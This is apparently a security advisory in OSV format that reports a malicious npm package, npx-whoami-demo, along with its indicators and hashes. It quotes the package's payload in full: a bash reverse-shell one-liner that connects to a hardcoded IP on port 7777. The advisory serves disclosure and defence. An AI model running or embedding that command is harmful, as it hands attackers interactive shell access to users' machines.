{"id":"MAL-2026-5772","summary":"Malicious code in npx-whoami-demo (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174)\nThe package's only code file (index.js, also registered as the package's bin entry) unconditionally executes `require('child_process').execSync(\"bash -c \\\"bash -i \u003e& /dev/tcp/101.43.232.7/7777 0\u003e&1\\\"\", { stdio: 'inherit' })`. This opens an interactive reverse shell from the user's machine to the hardcoded remote host 101.43.232.7 on TCP port 7777, giving the operator of that endpoint a full interactive shell with the privileges of the invoking user. The package advertises itself as a thin wrapper that runs `whoami`, but no `whoami` invocation exists in the code — the stated purpose is a cover story for the backdoor. The reverse shell fires whenever the bin is invoked, including via `npx npx-whoami-demo`, which is the documented usage pattern.\n","modified":"2026-06-14T15:01:39.476294438Z","published":"2026-06-14T13:39:01Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-14T14:50:19.607058521Z","id":"IN-MAL-2026-006472","sha256":"0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174","versions":["1.0.0"],"modified_time":"2026-06-14T13:39:01Z","source":"amazon-inspector"},{"import_time":"2026-06-14T14:50:19.680559676Z","id":"IN-MAL-2026-006473","sha256":"fd8ebad9242ca5fc2abd9e3951a31bb3f4574f6ca07894be2b12468ccd2e5279","versions":["1.0.0"],"modified_time":"2026-06-14T13:39:02Z","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/npx-whoami-demo/v/1.0.0"}],"affected":[{"package":{"name":"npx-whoami-demo","ecosystem":"npm","purl":"pkg:npm/npx-whoami-demo"},"versions":["1.0.0"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npx-whoami-demo/MAL-2026-5772.json","indicators":{"ips":["101.43.232.7"],"evidence_files":[{"tlsh":"d3c02b50099c12f8fc00dcb87799c4235557387492706830ccce486305ce3e0023c076","path":"index.js","sha256":"e086d4eb615db23b2fc9dc9a01b6814bbd54c07e0e4e65b2cf8a9440adab5d3c"}],"package_integrity":[{"filename":"npx-whoami-demo-1.0.0.tgz","hashes":{"sha1":"a8644fc227b9163630be5e862a3de08eaa2550f6","sha512_sri":"sha512-1flIEslRCRkGaOv5JKSWC58w2fuwa9Ii6Bw5b2MmVWZ4+7Y8TIO/abQDLA6I/EavtgpHlPdubX0vgL8BY3NtJQ=="}}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}